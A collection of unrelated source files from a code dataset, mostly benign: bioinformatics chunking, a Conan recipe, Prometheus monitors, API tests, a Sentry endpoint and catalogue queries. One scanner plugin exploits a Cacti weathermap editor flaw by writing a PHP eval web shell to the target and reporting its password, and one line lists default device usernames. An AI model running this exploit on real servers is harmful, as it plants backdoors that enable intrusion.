<filename>SLpackage/private/pacbio/pythonpkgs/pbsvtools/lib/python2.7/site-packages/pbsvtools/tasks/scatter_align_json_to_svsig.py
#! python
"""
Scatter inputs of pbsvtools.tasks.align_json_to_svsig
align takes two inputs:
Input: idx 0 - datastore.json containing a list of AlignmentSet files,
or a list of ConsensusAlignmentSet files.
idx 1 - TRF bed file
Output: idx 0 - FOFN of svsig.gz files
"""
from __future__ import absolute_import
import logging
import sys
import math
import os.path as op
from pbcommand.pb_io import write_pipeline_chunks
from pbcommand.models import FileTypes, PipelineChunk
from pbcoretools.datastore_utils import dataset_to_datastore, datastore_to_datastorefile_objs
from .align_json_to_svsig import Constants as BC
from .scatter_call import put_items_to_boxes
from ..basic import scatter_main, TCP_INPUT, TCP_OUTPUT, BaseScatterConstants
log = logging.getLogger(__name__)
class Constants(BaseScatterConstants):
"""Constants must be identical to align_json_to_svsig
Input: idx 0 - DataStore json of AlignmentSet (or ConsensusAlignmentSet)
idx 1 - TRF BED
Output: idx 0 - FOFN of svsig.gz
"""
TOOL_NAME = 'scatter_{}'.format(BC.TOOL_NAME)
DESCRIPTION = "Scatter inputs for pbsvtools.tasks.{}".format(TOOL_NAME)
CHUNK_KEYS = ('$chunk.datastore_id', '$chunk.bed_id')
INPUT_FILES = BC.INPUT_FILES
OUTPUT_FILES = [
TCP_OUTPUT(FileTypes.CHUNK, "cjson_out", "Chunk sv datastore JSON",
"Chunk sv datastore JSON", "align.datastore.chunked")
]
ALLOWED_TYPES = BC.ALLOWED_TYPES
def datastore_to_bam_files(i_datastore_fn):
"""
Return all external resources bam files from the input datastore json file.
"""
files, _, readcls, _ = datastore_to_datastorefile_objs(
i_datastore_fn, allowed_types=Constants.ALLOWED_TYPES)
dataset_obj = readcls(*[f.path for f in files])
return dataset_obj.toExternalFiles()
def run_main(i_datastore_fn, i_trf_fn, o_json_fn, max_nchunks):
"""
Parameters:
i_datastore_fn --- DataStore json of AlignmentSet or ConsensusAlignmentSet to chunk.
i_trf_fn --- Tandem Repeats in BED
o_json_fn -- Output json file
"""
output_dir = op.dirname(o_json_fn)
basename = 'chunk'
# Chunk input datastore json, generate multiple chunked datastore.json, and
# generate pbcommand.models.PipelineChunk objects
_, _, readcls, ext = datastore_to_datastorefile_objs(
i_datastore_fn, allowed_types=Constants.ALLOWED_TYPES)
bam_fns = datastore_to_bam_files(i_datastore_fn)
# Put bam files into boxes
n_chunks = max(1, min(max_nchunks, len(bam_fns)))
cutoff = math.ceil(len(bam_fns)*1.0/n_chunks)
boxes = put_items_to_boxes(bam_fns, [1 for _ in range(len(bam_fns))], n_chunks, cutoff)
chunks = []
for i, bam_fns_in_box in enumerate(boxes):
out_xml = op.join(output_dir, '{}.{}.{}'.format(basename, i, ext))
out_json = op.join(output_dir, '{}.{}.{}'.format(basename, i, 'datastore.json'))
readcls(*bam_fns_in_box).write(out_xml)
dataset_to_datastore(out_xml, out_json, Constants.TOOL_NAME)
# Create a chunk: get $chunk.datastore_id from chunk,
# use TandemRepeat masker bed as $chunk.bed_id
d = {Constants.CHUNK_KEYS[0]: out_json,
Constants.CHUNK_KEYS[1]: i_trf_fn}
chunk_id = Constants.TOOL_NAME+'_chunk_{}'.format(i) # chunks MUST have unique IDs
chunk = PipelineChunk(chunk_id, **d)
chunks.append(chunk)
log.info("Writing chunk.json to %s", o_json_fn)
write_pipeline_chunks(chunks, o_json_fn,
"created by %s" % Constants.TOOL_ID())
return 0
def rtc_runner(rtc):
"""Resolved tool contract runner."""
max_nchunks = rtc.task.max_nchunks if hasattr(
rtc.task, 'max_nchunks') else Constants.DEFAULT_NCHUNKS
return run_main(i_datastore_fn=rtc.task.input_files[0],
i_trf_fn=rtc.task.input_files[1],
o_json_fn=rtc.task.output_files[0],
max_nchunks=int(max_nchunks))
if __name__ == '__main__':
sys.exit(scatter_main(
args=sys.argv[1:], const=Constants, rtc_runner=rtc_runner, alog=log))
|
StarcoderdataPython
|
12804189
|
<gh_stars>0
import math
line = input().split()
n = int(line[0])
m = int(line[1])
a = int(line[2])
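# Each dimension needs ceil(size / a) tiles of side a, so the total tile count is
# the product of the two ceilings.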
answer = math.ceil(m/a) * math.ceil(n/a)
print(str(int(answer)))
|
StarcoderdataPython
|
3212513
|
# Copyright (c) 2019, <NAME> - SW Consulting. All rights reserved.
# For the licensing terms see LICENSE file in the root directory. For the
# list of contributors see the AUTHORS file in the same directory.
from conans import ConanFile, CMake, tools
from os import sep
class VTKDicomConan(ConanFile):
name = "vtk_dicom"
version = "0.8.10"
description = "DICOM for VTK"
url = "https://github.com/Kai-Wolf-SW-Consulting/Conan-Packages/vtk-dicom"
homepage = "https://github.com/dgobbi/vtk-dicom"
author = "<NAME> - SW Consulting <<EMAIL>>"
license = "BSD 3-Clause"
topics = ("vtk", "dicom")
generators = "cmake"
settings = "os", "arch", "compiler", "build_type"
requires = "vtk/8.2.0@kwc/stable"
exports_sources = "FindDICOM.cmake"
def source(self):
zipname = "v{0}.zip".format(self.version)
tools.get(self.homepage + "/archive/" + zipname)
# tools.patch(patch_file="cmake_config.patch", strip=1)
def build(self):
cmake = CMake(self)
cmake.definitions["BUILD_EXAMPLES"] = "OFF"
cmake.definitions["BUILD_PROGRAMS"] = "OFF"
cmake.definitions["BUILD_TESTING"] = "OFF"
vtk_root = self.deps_cpp_info["vtk"].rootpath.replace(sep, '/')
cmake.definitions["CMAKE_PREFIX_PATH"] = vtk_root
cmake.configure(source_folder="vtk-dicom-{0}".format(self.version))
cmake.build()
cmake.install()
def package(self):
self.copy("FindDICOM.cmake", ".", ".")
|
StarcoderdataPython
|
310953
|
<reponame>showa-yojyo/bin
#!/usr/bin/env python
"""async14tcpclient.py: TCP Echo client protocol
Assume that sync14tcpserver.py is running in another console.
Usage:
async14tcpclient.py
"""
import asyncio
async def tcp_echo_client(message, loop):
reader, writer = await asyncio.open_connection(
'127.0.0.1', 8888,
loop=loop)
print(f'Send: {message}')
writer.write(message.encode())
data = await reader.read(100)
print(f'Received: {data.decode()}')
print('Close the socket')
writer.close()
def main():
loop = asyncio.get_event_loop()
message = 'Hello World!'
loop.run_until_complete(tcp_echo_client(message, loop))
loop.close()
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
4918078
|
<filename>prometheus/monitoring.py
import requests
from prometheus.metrics import Metrics, BatchMetrics
from prometheus.utils import Time, TimeSince
from prometheus import settings
class Monitor:
metrics_cls = Metrics
def __init__(self, app_name):
self.app_name = app_name
self.metrics = self.metrics_cls.get_instance()
self.app_metric = self.metrics.apps.get(app_name, None)
if not self.app_metric:
self.app_metric = self.metrics.setup_metrics(app_name)
def __call__(self, func):
def inner(*args, **kwargs):
start_time = Time()
self.app_metric['REQUEST_COUNT'].inc()
self.app_metric['REQUEST_IN_PROGRESS'].inc()
error, response = None, None
try:
response = func(*args, **kwargs)
except Exception as exc:
error = exc
status = getattr(response, "status_code", 200 if not error else 400)
self.app_metric['RESPONSE_BY_STATUS'].labels(status=status).inc()
self.app_metric['REQUEST_LATENCY'].observe(
TimeSince(start_time)
)
self.app_metric['REQUEST_IN_PROGRESS'].dec()
if error:
raise error
return response
return inner
monitor = Monitor
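# Illustrative usage sketch (not part of the original module): the app name is a
# placeholder; the decorator records request count, in-progress gauge, latency and
# per-status metrics around the wrapped callable.
#
#     @monitor("example-service")
#     def handle_request(request):
#         ...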
class BatchMonitor(Monitor):
metrics_cls = BatchMetrics
def __init__(self, app_name):
super().__init__(app_name=app_name)
self.push_metrics_url = settings.PROMETHEUS_PUSH_METRICS_URL
def __call__(self, func):
def inner(*args, **kwargs):
error, response = None, None
start_time = Time()
self.app_metric['REQUEST_COUNT'].inc()
try:
response = func(*args, **kwargs)
except Exception as exc:
error = exc
self.app_metric["LAST_FAILURE"].set_to_current_time()
else:
self.app_metric["LAST_SUCCESS"].set_to_current_time()
finally:
self.app_metric['TIME_TAKEN'].set(
TimeSince(start_time)
)
self.push_metrics()
if error:
raise error
return response
return inner
def _collect_metrics(self):
metrics = {}
for key, value in self.app_metric.items():
metrics[key] = value.collect()[0].samples[0].value
metrics["APP_NAME"] = self.app_name
return metrics
def push_metrics(self):
print("pushing metrics")
base_url = "%s://%s:%s" % (
settings.PROMETHEUS_METRICS_PROTOCOL, settings.PROMETHEUS_METRICS_HOST, settings.PROMETHEUS_METRICS_PORT)
base_url += self.push_metrics_url
data = self._collect_metrics()
response = requests.post(base_url, data=data)
if response.status_code == 200:
print("metrics pushed successfully")
else:
print(response.content)
print("could not push metrics")
batch_monitor = BatchMonitor
|
StarcoderdataPython
|
141674
|
"""
Nose2 Unit Tests for the clusters module.
"""
from pprint import pprint
from os import environ, getenv
from atlasapi.atlas import Atlas
from atlasapi.organizations import Organization
from atlasapi.teams import TeamRoles
from atlasapi.atlas_users import AtlasUser
from json import dumps
from tests import BaseTests
import logging
from time import sleep
logger = logging.getLogger('test')
class ProjectTests(BaseTests):
def test_00_get_organizations(self):
for each in self.a.Organizations.organizations:
self.assertIsInstance(each, Organization, "An Atlas <Organization> should be returned")
test_00_get_organizations.basic = True
def test_01_get_organization_by_name(self):
for each in self.a.Organizations.organizations:
org_name = each.name
result = self.a.Organizations.organization_by_name(org_name=org_name)
#pprint(result.__dict__)
self.assertIsInstance(result, Organization, "An Atlas <Organization> should be returned")
self.assertEqual(org_name, result.name, "Returned result was not the same.")
test_01_get_organization_by_name.basic = True
def test_02_get_organization_by_id(self):
for each in self.a.Organizations.organizations:
org_id = each.id
result = self.a.Organizations.organization_by_id(org_id)
#pprint(result.__dict__)
self.assertIsInstance(result, Organization, "An Atlas <Organization> should be returned")
self.assertEqual(org_id, result.id, "Returned result was not the same.")
test_02_get_organization_by_id.basic = True
def test_03_get_organization_count(self):
result = self.a.Organizations.count
#pprint(result.__dict__)
self.assertIsInstance(result, int, "The count should be an int")
test_03_get_organization_count.basic = True
|
StarcoderdataPython
|
105502
|
from __future__ import absolute_import
from rest_framework import status
from rest_framework.response import Response
from sentry.api.bases.project import ProjectEndpoint, ProjectSettingPermission
from sentry.api.serializers import serialize
from sentry.api.serializers.rest_framework.rule import RuleSerializer
from sentry.integrations.slack import tasks
from sentry.mediators import project_rules
from sentry.models import AuditLogEntryEvent, Rule, RuleStatus
from sentry.web.decorators import transaction_start
class ProjectRuleDetailsEndpoint(ProjectEndpoint):
permission_classes = [ProjectSettingPermission]
@transaction_start("ProjectRuleDetailsEndpoint")
def get(self, request, project, rule_id):
"""
Retrieve a rule
Return details on an individual rule.
{method} {path}
"""
rule = Rule.objects.get(
project=project, id=rule_id, status__in=[RuleStatus.ACTIVE, RuleStatus.INACTIVE]
)
return Response(serialize(rule, request.user))
@transaction_start("ProjectRuleDetailsEndpoint")
def put(self, request, project, rule_id):
"""
Update a rule
Update various attributes for the given rule.
{method} {path}
{{
"name": "My rule name",
"conditions": [],
"actions": [],
"actionMatch": "all"
}}
"""
rule = Rule.objects.get(project=project, id=rule_id)
serializer = RuleSerializer(context={"project": project}, data=request.data, partial=True)
if serializer.is_valid():
data = serializer.validated_data
kwargs = {
"name": data["name"],
"environment": data.get("environment"),
"project": project,
"action_match": data["actionMatch"],
"conditions": data["conditions"],
"actions": data["actions"],
"frequency": data.get("frequency"),
}
if data.get("pending_save"):
client = tasks.RedisRuleStatus()
kwargs.update({"uuid": client.uuid, "rule_id": rule.id})
tasks.find_channel_id_for_rule.apply_async(kwargs=kwargs)
context = {"uuid": client.uuid}
return Response(context, status=202)
updated_rule = project_rules.Updater.run(rule=rule, request=request, **kwargs)
self.create_audit_entry(
request=request,
organization=project.organization,
target_object=updated_rule.id,
event=AuditLogEntryEvent.RULE_EDIT,
data=updated_rule.get_audit_log_data(),
)
return Response(serialize(updated_rule, request.user))
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@transaction_start("ProjectRuleDetailsEndpoint")
def delete(self, request, project, rule_id):
"""
Delete a rule
"""
rule = Rule.objects.get(
project=project, id=rule_id, status__in=[RuleStatus.ACTIVE, RuleStatus.INACTIVE]
)
rule.update(status=RuleStatus.PENDING_DELETION)
self.create_audit_entry(
request=request,
organization=project.organization,
target_object=rule.id,
event=AuditLogEntryEvent.RULE_REMOVE,
data=rule.get_audit_log_data(),
)
return Response(status=202)
|
StarcoderdataPython
|
9738390
|
<filename>overload/pvf/queries.py
# constructs Z3950/SierraAPI/PlatformAPI queries for particular resource
import logging
from pymarc import Record
from connectors.sierra_z3950 import Z3950_QUALIFIERS, z3950_query
from bibs.patches import remove_oclc_prefix
from logging_setup import LogglyAdapter
module_logger = LogglyAdapter(logging.getLogger('overload'), None)
def platform_status_interpreter(response=None):
"""
interprets request status code results and raises an appropriate msg to
be passed to gui
args:
response: response returned by the Platform API
return:
status (str)
"""
module_logger.debug('Interpreting response status code.')
if response is not None:
code = response.status_code
module_logger.info(
'Platform response status code: {}'.format(
code))
if code == 200:
status = 'hit'
elif code == 404:
status = 'nohit'
elif code == 405:
module_logger.error(
'Platform endpoint is not valid. '
'Response text: {}'. format(
response.text))
status = 'error'
elif code >= 500:
status = 'error'
else:
module_logger.error(
'Platform returned unidentified '
'status code: {}, text: {}'.format(
response.status_code,
response.text))
status = None
else:
module_logger.debug(
'No data to query. Skipping request.')
status = 'nohit'
return status
def query_runner(request_dst, session, bibmeta, matchpoint):
"""
picks api endpoint and runs the query
return:
list of InhouseBibMeta instances
"""
if request_dst == 'Platform API':
if matchpoint == '020':
if len(bibmeta.t020) > 0:
module_logger.info(
'Platform bibStandardNo endpoint request, '
'keywords (020): {}'.format(
bibmeta.t020))
response = session.query_bibStandardNo(keywords=bibmeta.t020)
else:
# do not attempt even to make a request to API
response = None
elif matchpoint == '024':
if len(bibmeta.t024) > 0:
module_logger.info(
'Platform bibStandardNo endpoint request, '
'keywords (024): {}'.format(
bibmeta.t024))
response = session.query_bibStandardNo(keywords=bibmeta.t024)
else:
response = None
elif matchpoint == 'sierra_id':
if bibmeta.sierraId is not None and len(bibmeta.sierraId) == 8:
# sierraID must be passed as a list to query_bibId
module_logger.info(
'Platform bibId endpoint request, '
'keywords (sierra id): {}'.format(
bibmeta.sierraId))
response = session.query_bibId(keywords=[bibmeta.sierraId])
else:
response = None
elif matchpoint == '001':
if bibmeta.t001 is not None:
module_logger.info(
'Platform bibControlNo endpoint request, '
'keywords (001): {}'.format(
bibmeta.t001))
stripped, controlNo_without_prefix = remove_oclc_prefix(
bibmeta.t001)
if stripped:
keywords = [bibmeta.t001, controlNo_without_prefix]
else:
keywords = [bibmeta.t001]
module_logger.info(
'Platform bibControlNo endpoint request, '
'keywords (001): {}'.format(
keywords))
response = session.query_bibControlNo(
keywords=keywords)
else:
response = None
else:
module_logger.error(
'Unsupported matchpoint specified: {}'.format(
matchpoint))
raise ValueError(
'unsupported matchpoint specified: {}'.format(
matchpoint))
status = platform_status_interpreter(response)
module_logger.debug('Platform response: {}'.format(
status))
if response is not None:
module_logger.debug(
'Converting Platform response to json')
response = response.json()
return (status, response)
elif request_dst == 'Sierra API':
pass
elif request_dst == 'Z3950':
if matchpoint == '020':
module_logger.debug(
'Vendor query keywords (020): {}'.format(
bibmeta.t020))
qualifier = Z3950_QUALIFIERS['isbn']
keywords = bibmeta.t020
elif matchpoint == '022':
module_logger.debug(
'Vendor query keywords (022): {}'.format(
bibmeta.t022))
qualifier = Z3950_QUALIFIERS['issn']
keywords = bibmeta.t022
elif matchpoint == 'sierra_id':
module_logger.debug(
'Vendor query keywords (sierra id): {}'.format(
bibmeta.sierraId))
qualifier = Z3950_QUALIFIERS['bib number']
keywords = bibmeta.sierraId
# lists
retrieved_bibs = []
if matchpoint in ('020', '022'):
for keyword in keywords:
module_logger.info(
'Z3950 request params: host={}, keyword={}, '
'qualifier={}'.format(
session['host'], keyword, qualifier))
success, results = z3950_query(
target=session,
keyword=keyword,
qualifier=qualifier)
if success:
for item in results:
retrieved_bibs.append(Record(data=item.data))
# strings
elif matchpoint == 'sierra_id':
if keywords and len(keywords) == 8:
module_logger.info(
'Z3950 query params: host={}, keyword={}, '
'qualifier={}'.format(
session['host'], keywords, qualifier))
success, results = z3950_query(
target=session,
keyword=keywords,
qualifier=qualifier)
if success:
for item in results:
retrieved_bibs.append(Record(data=item.data))
else:
module_logger.debug(
'Z3950 request params insufficient. Skipping.')
if len(retrieved_bibs) == 0:
status = 'nohit'
response = None
else:
status = 'hit'
response = retrieved_bibs
module_logger.info(
'Z3950 request results: {}, number of matches: {}'.format(
status, len(retrieved_bibs)))
return status, response
else:
module_logger.error('Unsupported query target: {}'.format(
request_dst))
raise ValueError(
'Unsupported query target: {}'.format(
request_dst))
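# Illustrative call sketch (not part of the original module): `session` is a
# Platform API session (or a Z3950 target dict) and `bibmeta` a parsed bib metadata
# object; both are placeholders here.
#
#     status, response = query_runner('Platform API', session, bibmeta, '020')
#     # status is typically 'hit', 'nohit' or 'error'; response carries the matches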
|
StarcoderdataPython
|
6523937
|
from django.contrib.auth.forms import AuthenticationForm
from django.utils.translation import ugettext as _
class MyMoneyAuthenticationForm(AuthenticationForm):
"""
Override default authentication form for theming only.
"""
def __init__(self, request=None, *args, **kwargs):
super(MyMoneyAuthenticationForm, self).__init__(
request, *args, **kwargs
)
self.fields['username'].widget.attrs.update({
'placeholder': _('Username'),
'class': 'form-control',
})
self.fields['password'].widget.attrs.update({
'placeholder': _('Password'),
'class': 'form-control',
})
|
StarcoderdataPython
|
11389606
|
<gh_stars>0
class Solution:
def wordPattern(self, pattern, str):
"""
:type pattern: str
:type str: str
:rtype: bool
"""
words = str.split(' ')
if len(words) != len(pattern):
return False
hashmap = {}
mapval = {}
for i in range(len(pattern)):
if pattern[i] in hashmap:
if hashmap[pattern[i]] != words[i]:
return False
else:
if words[i] in mapval:
return False
hashmap[pattern[i]] = words[i]
mapval[words[i]] = True
return True
"""
Time Complexity = O(n)
Space Complexity = O(c), c stands for unique count of pattern
Given a pattern and a string str, find if str follows the same pattern.
Here follow means a full match, such that there is a bijection between a letter in pattern and a non-empty word in str.
Example:
Input: pattern = "abba", str = "dog cat cat dog"
Output: true
"""
|
StarcoderdataPython
|
95666
|
<filename>morsecodetoolkit/data/__init__.py
from morsecodetoolkit.data.synthetic_dataset import SyntheticMorseDataset
__all__ = [
"SyntheticMorseDataset"
]
|
StarcoderdataPython
|
6613105
|
"""Sourcefile containing deck builder class for decks with multiple cards"""
from collections import OrderedDict
from copy import deepcopy
from archiTop.base_classes import DeckBuilder
from archiTop.resources import (card_asset_template, card_deck_template,
card_template)
from archiTop.scryfall.data_types import ScryfallCard
class MultiCardDeckBuilder(DeckBuilder):
""""MultiCardDeckBuilder class implementing abstract DeckBuilder class.
Used for card decks with multiple cards."""
def __init__(self, *args):
self.card_deck_json = deepcopy(card_deck_template)
self.contained_objects = []
self.deck_ids = []
self.custom_deck = OrderedDict()
super().__init__(*args)
def __repr__(self):
unique_cards = len(set(self.deck_ids))
return f'CardDeck({len(self.deck_ids)} total cards, {unique_cards} unique cards)'
def _populate_card_template(self, card: ScryfallCard):
"""Creates a new TableTop card object and fills information from card class.
Each card in deck needs one card object, therefore cards with quantity > 1 will be
duplicated.
Same cards, even when duplicated will keep the same ID.
Once populated, card object is inserted into contained_objects and id added to deck_ids.
Args:
card: Card to create card object for
"""
card_json = deepcopy(card_template)
card_json['CardID'] = self.current_card_id
card_json['Nickname'] = card.tabletop_name
# create one object per quantity
for _ in range(card.quantity):
self.contained_objects.append(card_json)
self.deck_ids.append(self.current_card_id)
self.current_card_id += 100
def _populate_card_asset_template(self, card: ScryfallCard):
"""Creates a new TableTop card asset object and fills with information from card class.
There should only exist one card asset template for each unique card.
Therefore cards with quantity > 1 only get one card asset.
Asset matching is done with insertion order of asset objects.
Order in the ContainedObjects, DeckID's must match the order of card assets.
Once populated, card asset is inserted in custom deck and asset id is incremented.
Args:
card: Card to create asset for
"""
card_asset_json = deepcopy(card_asset_template)
card_asset_json['FaceURL'] = card.image_url
card_asset_json['BackURL'] = self.card_back_url
self.custom_deck[str(self.current_card_asset_id)] = card_asset_json
self.current_card_asset_id += 1
def create_deck(self) -> dict:
"""Create the json structure for the card deck containing multiple cards.
Returns:
TableTop card deck json containing multiple cards
"""
for card in self.cards:
self._populate_card_template(card)
self._populate_card_asset_template(card)
self.card_deck_json['ContainedObjects'] = self.contained_objects
self.card_deck_json['DeckIDs'] = self.deck_ids
self.card_deck_json['CustomDeck'] = self.custom_deck
self.card_deck_json['Transform']['rotZ'] = 180 if self.hidden else 0
return self.card_deck_json
|
StarcoderdataPython
|
4842252
|
known_users = ['admin', 'root', 'administrator', 'cisco', 'guest', 'sa', 'nsroot', 'super', 'ubnt']
|
StarcoderdataPython
|
4879193
|
#-*-coding: UTF-8-*-
import numpy as np
import random
import math
import matplotlib.pyplot as plt
from LHSamples import Sample
import os
############################################
def dispPulse (t,Dp,t1,Tp):
"""
Baker et al. displacement pulse point value (cm)
:param t: time point(s)
:param Dp: permanent displacement(cm)
:param t1:pulse start time(s)
:param Tp:pulse period (s)
:return:discrete displacement value(cm)
"""
discretePulse=Dp/float(2)*np.sin(math.pi*(t-t1-Tp/float(2))/float(Tp))+Dp/float(2)
return discretePulse
############################################
def velPulse (t,Dp,t1,Tp):
"""
Baker et al. velocity pulse point value (cm/s)
:param t: time point(s)
:param Dp: permanent displacement(cm)
:param t1: pulse start time(s)
:param Tp: pulse period (s)
:return: discrete velocity value(cm/s)
"""
discretePulse=(Dp*math.pi)/(Tp*float(2))*np.cos(math.pi*(t-t1-Tp/float(2))/float(Tp))
return discretePulse
############################################acc(g)
def accPulse (t,Dp,t1,Tp):
"""
Baker et al. acceleration pulse point value (g)
:param t: time point(s)
:param Dp: permanent displacement(cm)
:param t1: pulse start time(s)
:param Tp: pulse period (s)
:return: discrete acceleration value(g)
"""
discretePulse=-(Dp*math.pi**2)/(float(2)*Tp**2)*np.sin(math.pi*(t-t1-Tp/float(2))/float(Tp))
return discretePulse/float(981)
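# Consistency note (added for clarity, not part of the original script): at the
# pulse midpoint t = t1 + Tp/2 the displacement model reaches Dp/2 while the
# velocity model peaks at Dp*pi/(2*Tp), e.g.:
#
#     dispPulse(t1 + Tp / 2.0, Dp, t1, Tp)   # -> Dp / 2
#     velPulse(t1 + Tp / 2.0, Dp, t1, Tp)    # -> Dp * math.pi / (2 * Tp)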
############################################
def iterateFunction (Tp,t1,dt,disp):
"""
Calculate the error between the original displacement and the displacement pulse model
:param Tp: pulse period (s)
:param t1: pulse start time(s)
:param dt: time interval (s)
:param disp: original displacement time history(cm)
:return: deltaError-mean error
Tp-pulse period (s)
t1=pulse start time(s)
Dp-permanent displacement(cm)
"""
startNumber=int(t1/float(dt))
endNumber=int((t1+Tp)/float(dt))
intervalT=[x*dt for x in range(startNumber,endNumber)]
pulseMotion=[]
counterMotion=disp[startNumber:endNumber]
Dp=sum(disp[-50:])/float(50)
for each in intervalT:
discretePoint=dispPulse(each,Dp,t1,Tp)
pulseMotion.append(discretePoint)
deltaError=sum([(x-y)**2 for x,y in zip(counterMotion,pulseMotion)])/float(endNumber-startNumber)
return deltaError,Tp,t1,Dp
####################################################################
#####################---main program---#############################
####################################################################
fileName="TCU075.txt"
disp=np.loadtxt('dispBaselineCorre/E/'+fileName)
vel=np.loadtxt('velBaselineCorre/E/'+fileName)
acc=np.loadtxt('accBaselineCorre/E/'+fileName)
dt=0.005
numPoint=len(disp)
errorList=[10**10]
TpList=[0]
t1List=[0]
DpList=[0]
nIterate=2000
bounds = [(0.01,10),(20,33)]
instance = Sample(bounds, nIterate)
Tp = instance.LHSample()[:,0]
t1 = instance.LHSample()[:,1]
for i1 in range(nIterate):
errorTerm,TpTerm,t1Term,DpTerm=iterateFunction(Tp[i1],t1[i1],dt,disp)
if errorTerm<errorList[0]:
errorList[0]=errorTerm
TpList[0]=TpTerm
t1List[0]=t1Term
DpList[0]=DpTerm
print ("Tp:",TpList[0])
print ("t1:",t1List[0])
print ("Dp:",DpList[0])
####################################################################
startNumber=int(t1List[0]/float(dt))
endNumber=int((t1List[0]+TpList[0])/float(dt))
intervalT=[x*dt for x in range(startNumber,endNumber)]
counterMotion=disp[startNumber:endNumber]
dispMotion=[]
velMotion=[]
accMotion=[]
for each in intervalT:
discretePoint=dispPulse(each,DpList[0],t1List[0],TpList[0])
dispMotion.append(discretePoint)
velDiscretePoint=velPulse (each,DpList[0],t1List[0],TpList[0])
velMotion.append(velDiscretePoint)
accDiscretePoint=accPulse(each,DpList[0],t1List[0],TpList[0])
accMotion.append(accDiscretePoint)
####################################################################
revisedStart=[0 for x in range(startNumber)]
revisedEnd=[dispMotion[-1] for x in range(endNumber,numPoint)]
revisedEndVel=[0 for x in range(endNumber,numPoint)]
revisedEndAcc=[0 for x in range(endNumber,numPoint)]
revisedDisp=revisedStart+dispMotion+revisedEnd
revisedVel=revisedStart+velMotion+revisedEndVel
revisedAcc=revisedStart+accMotion+revisedEndAcc
residualDisp=[num2-num3 for num2,num3 in zip(disp,revisedDisp)]
residualVel=[num2-num3 for num2,num3 in zip(vel,revisedVel)]
residualAcc=[num2-num3 for num2,num3 in zip(acc,revisedAcc)]
####################################################################
np.savetxt("accPulse/E/"+fileName,revisedAcc,fmt="%f")
np.savetxt("velPulse/E/"+fileName,revisedVel,fmt="%f")
np.savetxt("dispPulse/E/"+fileName,revisedDisp,fmt="%f")
np.savetxt("accResidual/E/"+fileName,residualAcc,fmt="%f")
np.savetxt("velResidual/E/"+fileName,residualVel,fmt="%f")
np.savetxt("dispResidual/E/"+fileName,residualDisp,fmt="%f")
####################################################################
times=[dt*num1 for num1 in range(numPoint)]
plt.subplot(331)
# plt.plot(times,acc,"-k")
plt.plot(times,revisedAcc,"--r")
plt.subplot(334)
plt.plot(times,vel,"-k")
plt.plot(times,revisedVel,"--r")
plt.subplot(337)
plt.plot(times,disp,"-k")
plt.plot(times,revisedDisp,"--r")
plt.show()
|
StarcoderdataPython
|
1777867
|
#!/usr/bin/env python
# encoding: utf-8
from t import T
import requests,urllib2,json,urlparse
class P(T):
def __init__(self):
T.__init__(self)
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
target_url = "http://"+ip+":"+str(port)+"/plugins/weathermap/editor.php"
result = {}
result['result']=False
r=None
try:
r=requests.get(url=target_url,timeout=2)
if r.status_code==200:
shell_url = "http://"+ip+":"+str(port)+"/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=<?php echo(md5(1));@eval($_POST[0]);?>&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_a rrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name"
r=requests.get(url=shell_url,timeout=2)
if r.status_code == 200:
result['result'] = True
result['VerifyInfo'] = {}
result['VerifyInfo']['type'] = 'cacti weathermap code exploit'
result['VerifyInfo']['URL'] = ip + "/plugins/weathermap/editor.php"
result['VerifyInfo']['payload'] = 'IP/plugins/weathermap/editor.php'
result['VerifyInfo']['result'] = r.text
result['VerifyInfo']['shellurl'] ='plugins/weathermap/configs/test.php pass is 0'
else:
target_url = "http://"+ip+":"+str(port)+"/cacti/plugins/weathermap/editor.php"
r=requests.get(url=target_url,timeout=2)
if r.status_code==200:
shell_url = "http://"+ip+":"+str(port)+"/cacti/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=<?php echo(md5(1));@eval($_POST[0]);?>&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_a rrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name"
r=requests.get(url=shell_url,timeout=2)
if r.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['shellurl'] ='/cacti/plugins/weathermap/configs/test.php pass is 0'
result['result'] = True
result['VerifyInfo']['type'] = 'cacti weathermap code exploit'
result['VerifyInfo']['URL'] = ip + "/cacti/plugins/weathermap/editor.php"
result['VerifyInfo']['payload'] = 'IP/cacti/plugins/weathermap/editor.php'
result['VerifyInfo']['result'] = r.text
except Exception,e:
            print e
finally:
if r is not None:
r.close()
del r
return result
if __name__ == '__main__':
print P().verify(ip='172.16.31.10',port='80')
|
StarcoderdataPython
|
304008
|
<reponame>winkemoji/snmp-collector
import subprocess
import traceback
def start():
res = subprocess.run(['python', 'superserver.py'])
if res.returncode!=0:
raise Exception
def main():
try:
start()
except BaseException as e:
traceback.print_exc()
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
258393
|
#!/usr/bin/env python3
try:
import systemd.daemon
from systemd import journal
systemd_enable=True
except ImportError:
systemd_enable=False
def ready():
if systemd_enable:
systemd.daemon.notify('READY=1')
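# Illustrative usage sketch (the entry point below is assumed, not part of the
# original module): a daemon run from a systemd unit with Type=notify would
# call ready() once its start-up work has finished, e.g.
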